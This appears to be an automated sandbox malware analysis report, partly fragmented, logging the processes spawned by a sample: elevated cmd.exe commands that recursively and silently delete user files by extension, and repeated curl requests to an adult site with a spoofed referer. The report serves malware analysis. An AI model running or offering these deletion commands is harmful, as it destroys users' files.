Commandline:	C:\Windows\system32\cmd.exe /c del /S /Q *.pptx c:\users\%username%\ > nul
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Start time:	15:59:10
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c del /S /Q *.pptm c:\users\%username%\ > nul
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Start time:	15:59:13
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c del /S /Q *.jtdc c:\users\%username%\ > nul
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Start time:	15:59:17
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c del /S /Q *.jttc c:\users\%username%\ > nul
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Start time:	15:59:21
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c del /S /Q *.jtd c:\users\%username%\ > nul
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Z0hOr2pD7k

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

DDoS:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: Z0hOr2pD7k.exe PID: 6552 Parent PID: 6012

General

Analysis Process: conhost.exe PID: 6560 Parent PID: 6552

General

Analysis Process: cmd.exe PID: 6608 Parent PID: 6552

General

Analysis Process: cmd.exe PID: 6632 Parent PID: 6552

Start time:	15:59:25
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c del /S /Q *.jtt c:\users\%username%\ > nul
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Start time:	15:59:30
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c del /S /Q *.txt c:\users\%username%\ > nul
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Start time:	15:59:33
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c del /S /Q *.exe c:\users\%username%\ > nul
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Start time:	15:59:37
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c del /S /Q *.log c:\users\%username%\ > nul
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Start time:	15:59:42
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Start time:	15:59:43
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Start time:	15:59:44
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Start time:	15:59:45
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Start time:	15:59:46
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Start time:	15:59:47
Start date:	22/07/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language